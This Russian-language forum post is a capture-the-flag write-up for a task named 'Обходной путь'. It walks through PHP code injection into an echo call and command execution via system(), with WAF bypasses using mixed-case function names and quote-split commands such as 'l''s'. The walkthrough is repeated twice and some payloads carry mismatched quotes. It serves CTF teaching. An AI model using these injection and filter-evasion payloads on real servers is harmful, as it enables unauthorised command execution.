tree
13.12.2023, 18:45
Привет! Разберем решение таска Обходной путь
Функционал приложения php функция - echo. появляется мысль о эксплутации php injection попробуем вывести phpinfo()
https://forum.antichat.xyz/attachments/29108998/1702477113436.png
Сработало! значит попробуем выполнить команды на сервере через функцию system
echo '123';system(”id”);
https://forum.antichat.xyz/attachments/29108998/1702477206743.png
WAF нас блочит, значит будем пробовать обойти фильтрацию.
echo '123';sYsTem("id");
https://forum.antichat.xyz/attachments/29108998/1702477253977.png
Отлично! Пробуем посмотреть файлы в каталоге.
echo '123';sYsTem("ls");
но WAF снова нас заблочил, значит и тут найти обходной путь
echo ‘123’;sYsTem("'l''s'"’);
https://forum.antichat.xyz/attachments/29108998/1702477455831.png
Дальше остается найти только флаг
Функционал приложения php функция - echo. появляется мысль о эксплутации php injection попробуем вывести phpinfo()
https://forum.antichat.xyz/attachments/29108998/1702477113436.png
Сработало! значит попробуем выполнить команды на сервере через функцию system
echo '123';system(”id”);
https://forum.antichat.xyz/attachments/29108998/1702477206743.png
WAF нас блочит, значит будем пробовать обойти фильтрацию.
echo '123';sYsTem("id");
https://forum.antichat.xyz/attachments/29108998/1702477253977.png
Отлично! Пробуем посмотреть файлы в каталоге.
echo '123';sYsTem("ls");
но WAF снова нас заблочил, значит и тут найти обходной путь
echo ‘123’;sYsTem("'l''s'"’);
https://forum.antichat.xyz/attachments/29108998/1702477455831.png
Дальше остается найти только флаг